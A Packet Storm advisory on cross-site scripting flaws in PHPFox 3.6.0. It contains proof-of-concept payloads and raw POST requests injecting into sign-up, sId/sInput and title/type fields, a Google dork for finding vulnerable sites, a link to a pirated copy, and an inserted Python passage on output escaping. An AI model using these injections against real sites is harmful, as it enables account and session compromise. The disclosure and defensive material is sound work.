PHPFox 3.6.0 Cross Site Scripting

2013-10-14T00:00:00
ID PACKETSTORM:123593
Type packetstorm
Reporter BHG Security Center
Modified 2013-10-14T00:00:00

Description

------------------------------------------------------------  
Exploit Title: PHPFox v3.6.0 (build6) Multiple Cross-Site Scripting vulnerabilities  
------------------------------------------------------------  
Author: #BHG Security Center  
Date: Saturday, October 12, 2013  
Vendor: http://www.phpfox.com  
Software Link: http://dl.nuller.ir/PhpFox.Community.Edition.v3.6.0.Build.6.PHP.NULL-iND%5BNuLLeR.iR%5D.zip  
Vulnerable Version(s): v3.6.0.Build.6 is vulnerable.  
Tested Version: 3.6.0.Build.6  
Vulnerability Type: Cross-Site Scripting  
Google Dork: "Powered By PHPFox Version 3.6.0"  
Risk Level: High  
Software Price: $299  
Tested on: Windows, PHP 5.2  
Vulnerability Video : http://www.youtube.com/watch?v=Yw7Wgr4LtGo&feature  
-- Vulnerability discovered by: Net.Edit0r (Dariush Nasirpour) - Email: Black.hat.tm@gmail.com  
  
  
------------------------------------------------------------  
== Proof of concept ==  
------------------------------------------------------------  
[-] Description:  
[-] PoC 1.1: XSS code injection via the Join (sign-up) form field:  
  
1) XSS code: <script>alert(12)</script>  
2) Encode to: <script>alert(12)</script>  
3) Put it in the First Name field when signing up  
4) After logging in, hover your mouse over Recent Logins  
5) You will see that the XSS code executed successfully  
  
------------------------------------------------------------  
Vulnerable File(s):  
[+] ajax.php  
  
Vulnerable Parameter(s):  
[+] sId  
[+] sInput  
[+] title  
[+] type  
  
[-] PoC 2.2:  
## URL-encoded POST input (sId & sInput) was set to <script>alert(0)</script>  
  
## Request   
  
POST /upload/static/ajax.php HTTP/1.1  
=undefined&core[ajax]=true&core[call]=captcha.reload&core  
[is_admincp]=0&core[is_user_profile]=0&core[profile_user_id]  
=0&core[security_token]=572157ee6d639d835e70475f46a6ef74&sId=[Inject XSS Code]&sInput=[Inject XSS Code]  
  
[-] PoC 3.3:  
## URL-encoded POST input (title & type) was set to " onmouseover=prompt(951977) bad="  
  
## Request   
  
POST /upload/static/ajax.php HTTP/1.1  
core[ajax]=true&core[call]=share.popup&core[security_token]=572157ee6d639d835e70475f46a6ef74  
&feed_id=1&height=300&is_feed_view=1&sharemodule=event  
&title=[Inject XSS Code]&type=[Inject XSS Code]&url=http%3A%2f%2fblack-hg.org%2findex.phpF%26width%3D550  
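  
The two PoCs above fail in two different output contexts: the First Name value lands in an HTML text node (the Recent Logins tooltip), while title and type land inside attribute values, which is why the second payload needs no `<` at all and instead breaks out of the quotes with `" onmouseover=...`. The fix on the application side is context-aware output encoding. The following is an added Python illustration, not PHPFox code and not the advisory author's: the render functions are a hypothetical sketch of the defect class (untrusted input echoed verbatim) beside the hardened form, the markup shapes are assumed, and the payloads are the strings quoted in the advisory, used only as test input. The `audit` helper parses the rendered markup and reports which tags and on* event attributes the browser would actually see.

```python
import html
from html.parser import HTMLParser

# Constructed test inputs: the payload strings reported in the advisory.
STORED_NAME_PAYLOAD = "<script>alert(12)</script>"
ATTR_PAYLOAD = '" onmouseover=prompt(951977) bad="'


def escape_text(value: str) -> str:
    """Entity-encode for an HTML text node (the Recent Logins name case)."""
    return html.escape(value, quote=True)


def escape_attr(value: str) -> str:
    """Entity-encode for a double-quoted attribute value (the title=/type= case).

    quote=True turns both " and ' into entities, so the value cannot close the
    attribute early and smuggle in an event handler such as onmouseover.
    """
    return html.escape(value, quote=True)


# Hypothetical markup shapes; NOT PHPFox template code.
def render_recent_login_unsafe(first_name: str) -> str:
    # Defect class: the stored field is echoed verbatim into a text node.
    return f'<li class="login">{first_name}</li>'


def render_recent_login(first_name: str) -> str:
    return f'<li class="login">{escape_text(first_name)}</li>'


def render_share_popup_unsafe(title: str, share_type: str) -> str:
    # Defect class: request parameters are echoed verbatim into attribute values.
    return f'<div class="share" title="{title}" data-type="{share_type}"></div>'


def render_share_popup(title: str, share_type: str) -> str:
    return (
        f'<div class="share" title="{escape_attr(title)}" '
        f'data-type="{escape_attr(share_type)}"></div>'
    )


class _MarkupAudit(HTMLParser):
    """Collects every start tag and every on* attribute the parser sees."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []
        self.event_attrs: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.event_attrs.extend(name for name, _ in attrs if name.startswith("on"))


def audit(markup: str) -> tuple[list[str], list[str]]:
    """Return (tags seen, event-handler attributes seen) for rendered markup."""
    parser = _MarkupAudit()
    parser.feed(markup)
    parser.close()
    return parser.tags, parser.event_attrs


if __name__ == "__main__":
    # Unsafe text context: an extra <script> tag appears; safe: only the template's <li>.
    print(audit(render_recent_login_unsafe(STORED_NAME_PAYLOAD)))   # (['li', 'script'], [])
    print(audit(render_recent_login(STORED_NAME_PAYLOAD)))          # (['li'], [])
    # Unsafe attribute context: onmouseover becomes a real attribute; safe: it stays data.
    print(audit(render_share_popup_unsafe("Event", ATTR_PAYLOAD)))  # (['div'], ['onmouseover'])
    print(audit(render_share_popup("Event", ATTR_PAYLOAD)))         # (['div'], [])
```

The audit is deliberately a parser rather than a substring search: whether a payload "worked" is decided by what the HTML parser produces, so checking the parsed tag list and attribute names is the test that matches the advisory's own success criterion (an executing script or a live event handler). Note that this encoding covers HTML text and attribute contexts only; a value inserted into a JavaScript block or a URL needs that context's own encoder.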
  
------------------------------------------------------------  
Timeline:  
------------------------------------------------------------  
Advisory Publication: September 18, 2013 [without technical details]  
Vendor Notification: September 18, 2013  
Public Disclosure: October 12, 2013  
  
#BHG Security Center  
# Gr33tz:  
# Blackhat Group Members : 3H34N, G3n3Rall, l4tr0d3ctism, NoL1m1t, b3hz4d  
# HUrr!c4nE,E2MA3N,solt6n,Dj.TiniVini  